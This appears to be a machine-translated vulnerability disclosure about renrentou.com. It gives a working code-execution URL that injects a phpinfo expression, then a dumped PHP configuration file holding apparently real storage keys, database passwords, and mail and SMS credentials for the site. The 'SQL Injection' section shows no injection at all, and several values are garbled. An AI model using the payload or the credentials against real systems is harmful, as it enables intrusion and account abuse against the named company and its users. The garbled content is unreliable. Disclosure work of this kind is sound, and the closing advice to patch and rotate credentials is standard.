Code execution and MySQL injection vulnerability on Renren's main site
Code Execution
Http://www.renrentou.com/project/list/status/%24%7b%40phpinfo () % 7d/sort/1/trade/0/p/2

SQL Injection
/Article/UploadPic/2015-7/2015730171537549. png [/img] // + assets // | online configuration // + Response return array ('url' => array ('www '=> HTTP_PROTOCAL. 'www .renrentou.com ', 'admin' => HTTP_PROTOCAL. 'admin .renrentou.com ', 'user' => HTTP_PROTOCAL. 'User .renrentou.com ', 'img' => HTTP_PROT OCAL. 'static .rentou.com ', // normal attachment address 'img2' => HTTP_PROTOCAL. 'img2 .renrentou.com ', // normal attachment cdn address 'imgpui' => HTTP_PROTOCAL. 'static2 .renrentou.com ', // encrypt the attachment address 'wap' => HTTP_PROTOCAL. 'wap .renrentou.com ', 'api' => HTTP_PROTOCAL. 'api .renrentou.com ', 'app' => HTTP_PROTOCAL. 'app .renrentou.com ',), // oss attachment storage 'aliyun _ Oss' => array ('host' => 'oss -cn-qingdao-internal.aliyuncs.com ', // intranet address of the Qingdao node // 'host' => 'Oss -cn-qingdao.aliyuncs.com ', // The Internet address of the Qingdao node 'bucket' => 'renrentou', 'bucket2' => 'renrentou-private ', 'Access _ id' => 'p3k666aaxh4r0dzi', 'Access _ key' => 'fekmnnkvqqprw2tcmvkwdp6sz7vfuk ',), // you can have multiple email sending accounts. 
Randomly select 'email _ config' => array ('qq' => array ('host' => 'smtp .exmail.qq.com ', 'Port' => '25 ', 'username' => 'no-replay@renrentou.com.cn ', 'Password' => 'rrt123', 'from' => 'no-replay@renrentou.com ', 'fromname' => 'renren put'), 'sohu '=> array ('host' =>' http://sendcloud.sohu.com/webapi/mail.send.json ', 'Api _ user' => 'renrentou', 'api _ key' => 'dkwu4?ty=56w70', 'from' => 'service @ mail.renrentou.com ', 'fromname' => 'renren put '),), // configure 'sms _ config' => array (// yimei sms 'yimei' => array ('url' =>' http://sdk999ws.eucp.b2m.cn:8080/sdk/SDKService ', 'Username' => '9sdk-EMY-0999-JDWML', 'Password' => '123', 'sessionkey' => '123 '), // ronglian cloud communication 'yuntongxun' => array ('host' => 'app .cloopen.com ', 'Port' => '123 ', 'version' => '2017-12-26 ', 'main _ account' => '8a48b5514a61a814014a79d945a60e43', 'main _ token' => 'authorization ', 'app _ id' => 'af98f894a70a61d014a79daca760596 '), // mandao technology 'mdkj' => array ('sn '=> 'sdk-BBX-010-22614 ', /// replace it with your own serial number' Pwd' => strtoupper (md5 ('sdk-BBX-010-22614 '. 'D-7e55-4 '), // here the password needs to be encrypted in md5 (sn + password) 32-bit capital 'mobile' => '', // multiple mobile phone numbers are separated by commas (,). There is no length limit in post theory. 
it is recommended that a group of less than or equal to 10000 mobile phone numbers 'content' => '', // iconv (" gb2312 "," UTF-8 // IGNORE ", hi, test the text message [XXX company] '), // The text message content 'text' => '', 'stime' => '', // The scheduled time format is 11:09:21 'msgfmt' => '', 'rrid' => ''),), /* database settings */'sys _ db_type '=> 'mysql', // Database Type 'sys _ db_host' => 'f Eidurds2.mysql.rds.aliyuncs.com ', // server address 'sys _ db_name' => 'renrentou', // database name 'sys _ db_user '=> 'renrentou ', // username 'sys _ db_pwd' => 'eg8x9wedt6co ', // password 'sys _ db_port' => 3306, // port/* data cache settings */'sys _ cache_open '=> true, // whether global cache is enabled; false/true: 'sys _ cache_time' => 86400, // data cache validity period 'sys _ cache_prefix' => 'rrt _ ', // cache prefix 'sys _ cache_type' => 'redis ', 'sys _ redis_host '=> 'server1', 'sys _ redis_port' => 6379, 'sys _ default_key '=> 'djjgiudnupfy7h', // default reversible key 'sys _ platform_key' => 'dujg9d7dhfy7h', // promotion key);?> /** Do not modify the configuration file for payment without authorization **/'pay' => array ('pay _ off' => FALSE, // payment switch 'platformno' => '000000', // merchant ID 'feemode' => 'platform ', // PLATFORM: the company pays the service fee. The USER pays the service fee. Here, the charging mode is 'idcard' => 'g2 _ idcard ', // gsf-idcard is the first generation ID card G2_IDCARD is the second generation ID card. 
Here it is the user ID card type 'own _ account' => 1, // User account type: 'Project _ account' => 2, // User account type: 'Project _ rate' => 0.05, // The current fee deduction rate is 5% 'verifying' => 'verifying ', // The investor binds the 'verified' => 'verified 'to the bank card status authentication ', // The status of the bank card bound to the investor has been authenticated 'is _ handle' => 1, // The user callback processing has been processed 'un _ handle' => 0, // user callback processing not processed 'pay _ action_type '=> array ('torecharge' => 1, // interface partial action type recharge 'towithdraw _ own' => 2, // 'totransfer _ project' => 3, // 'freeze '=> 4, // some action types of the interface subscribe (I .e. freeze) 'unfreeze '=> 5, // some action TYPES OF THE INTERFACE cancel the bidding (unfreeze) 'loan' => 6, // The Operation Type of the interface is finalized (lending) 'eepa' => 3, // whether the operation type of the interface user has registered an ebao account), 'onlogin' => 'loginy ', // server callback 'callback' => 'callback', // the browser gateway calls back 'pay _ query_status '=> array ('Recharge _ record' => 'Recharge _ RECORD ', // recharge 'repayment _ record '=> 'repayment _ RECORD' for a single business Query type ', // The repayment of a single business Query type subject 'withraw _ record' => 'withraw _ record ', // 'payment _ record' => 'payment _ record' for a single business Query type, // investment loan for a single business Query type), 'prehat' => 2, // users' relationship interviews with the project 'subnotification' => 8, // users' relationship subscriptions to the project 'reservation' => 4, // The user subscribes for the 'Attention '=> 1 for the project relationship, // The user follows the 'freeze _ status' => array ('orientation' => 1, // only enable the targeted crowdfunding switch for subscription: 'purchase '=> 2, // only enable the share limit switch for subscription 'projector' => 3 // only determine 
the amount for billing by the project Party),/** configuration file for payment, do not modify ** // * database settings */'sys _ db_type '=> 'mysql', // Database Type 'sys _ db_host' => '2017. 168.1.252 ', // server address 'sys _ db_name' => 'renrentou _ dev', // database name 'sys _ db_user '=> 'root ', // username 'sys _ db_pwd '=> '000000', // password 'sys _ db_port' => 123456, // port 'sys _ db_prefix' => '', // database table prefix
Solution: filter and validate the request parameters, and upgrade the framework to a patched version. Because the disclosed configuration includes database, storage, mail and SMS credentials, those values should also be treated as exposed and rotated.